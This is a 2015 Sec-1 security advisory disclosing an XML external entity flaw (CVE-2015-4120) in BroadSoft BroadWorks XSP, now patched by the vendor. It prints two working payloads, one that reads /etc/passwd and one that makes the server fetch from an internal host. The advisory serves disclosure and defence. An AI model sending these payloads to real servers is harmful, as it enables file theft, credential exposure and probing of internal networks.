Sec-1 Advisory: BroadSoft BroadWorks XSP XML External Entity Injection

Sec-1 Security Advisory
Advisory Name : XML External Entity Injection in BroadWorks XSP XML Interface
Discovery Date : 23/03/2015
Release Date : 02/06/2015
Application : BroadWorks XSP XML Interface 17.0 XML Interface on TCP/8011
Platform : Linux
Severity : HIGH.Arbitrary File Retrieval
CVE : CVE-2015-4120
Discovered by : Jordan Carter
Holly Williams
Vendor Status : Resolved in May 2015 BroadWorks Update available from http://xchange.broadsoft.com/
Website : https://www.sec-1.com/blog
http://www.broadsoft.com/service-providers/products-applications/broadworks/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-4120

Vulnerability Summary

XML External Entity Injection

An XML external entity injection vulnerability was identified that allows an unauthenticated attacker to read arbitrary files from the server and enumerate internal web applications.
Applications that parse XML input may be vulnerable to security issues around XML External Entities. Many parsers are often vulnerable by default unless a developer takes deliberate steps to remove the vulnerability.
If a parser allows external entities to be defined and then called by an attacker this may allow an attacker to read arbitrary files, load content from applications that are only intended to be accessed internally, and potentially allow the attacker to perform a denial of service against the application server. In very rare cases XXE can lead to remote command execution.

Exploit

When a specially crafted payload is supplied to the affected application listening on port TCP/8011 the server parses the supplied content as valid XML. This can be leveraged to read arbitrary server side files and communicate with internal network components.

Example Payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "file:///etc/passwd">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


The above payload can be transmitted with free publically available tools, such as telnet and will result in a vulnerable server responding with the contents of the local /etc/passwd file. An attacker that is able to enumerate the location of sensitive files, such as configuration files, could gain unauthorised access to data such as system credentials. Additionally it should be noted that remote internal systems, that are generally not accessible to the attacker, could be targeted with payloads such as:


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "http://10.50.1.1:80/">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


This will request the content from a web-server residing at 10.50.1.1 on port 80. A payload such as this could allow an attacker to enumerate internal web applications, potentially gain access to confidential data and conduct attacks on internal systems such as error based SQL injection. Potentially leading to further network compromise.

Vendor Response


The vendor has patched the XXE Injection issues in the May 2015 BroadWorks update. Sec-1 would like to thank BroadSoft for their prompt and professional response.

Additional CVE Details


The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2015-4120 : Assigned to the XML External Entity (XXE) discovery. Assigned Bug ID# TAC-129144 by BroadSoft.
Copyright 2015 Sec-1 LTD. All rights reserved.

This entry was posted in Advisories. Bookmark the permalink.

Comments are closed.